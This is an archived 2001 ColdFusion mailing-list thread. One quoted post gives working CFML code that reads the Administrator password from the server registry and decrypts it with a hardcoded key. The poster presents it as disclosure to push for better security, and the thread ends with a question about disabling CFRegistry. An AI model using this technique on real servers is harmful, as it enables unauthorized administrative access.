How does one disable CFRegistry?
Thanks!
John
-----Original Message-----
From: CF [mailto:[EMAIL PROTECTED]]
Sent: Saturday, March 10, 2001 10:48 AM
To: CF-Talk
Subject: Re: Finding the CF Administrator password
Yeah .. someone sent me the key a little earlier and it worked like a
charm. Actually, this other peson also showed me how to find the key to
begin with ... it's amazingly simple. I don't see why you should be
flamed .. people should not have CFRegistry active on a machine where
they wouldn't want people getting in and doing stuff like this anyway.
This is just another great example of why ;)
Todd Ashworth
Web Application Developer
Network Administrator
Saber Corporation
314 Oakland Ave.
Rock Hill, SC 29730
(803) 327-0137 [111] (p)
(803) 328-2868 (f)
----- Original Message -----
From: "Dain Anderson" <[EMAIL PROTECTED]>
To: "CF-Talk" <[EMAIL PROTECTED]>
Sent: Saturday, March 10, 2001 12:07 AM
Subject: Re: Finding the CF Administrator password
> Todd,
>
> It's very easy to retrieve the admin password, and I'm sure I will get
> flamed for showing this, but what the hell:
>
> <CFSET CFKey = "4p0L@r1$">
>
> <CFREGISTRY ACTION=GET
>
>
Branch="HKEY_LOCAL_MACHINE\SOFTWARE\Allaire\ColdFusion\CurrentVersion\Se
rver
> "
> Entry="AdminPassword"
> Variable="AdminPassword">
>
> <CFOUTPUT>
> Registry Password: #CFusion_Decrypt(AdminPassword, CFKey)#
> </CFOUTPUT>
>
> The key to decrypt it spells "4 Polaris" (Allaire inside joke?) --
> this isn't my doing; rather, I was sent this from an anonymous source
> via the [EMAIL PROTECTED] address. I hope this will show Allaire
> and ISPs that there is a need for encryption, not encoding, for things
> such as this. I
am
> against template encryption personally, but the administrator feature
should
> have much better security. We live and learn, strive and yearn.
>
> Dain Anderson
> Caretaker, CF Comet
> http://www.cfcomet.com/
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Structure your ColdFusion code with Fusebox. Get the official book at
http://www.fusionauthority.com/bkinfo.cfm
Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists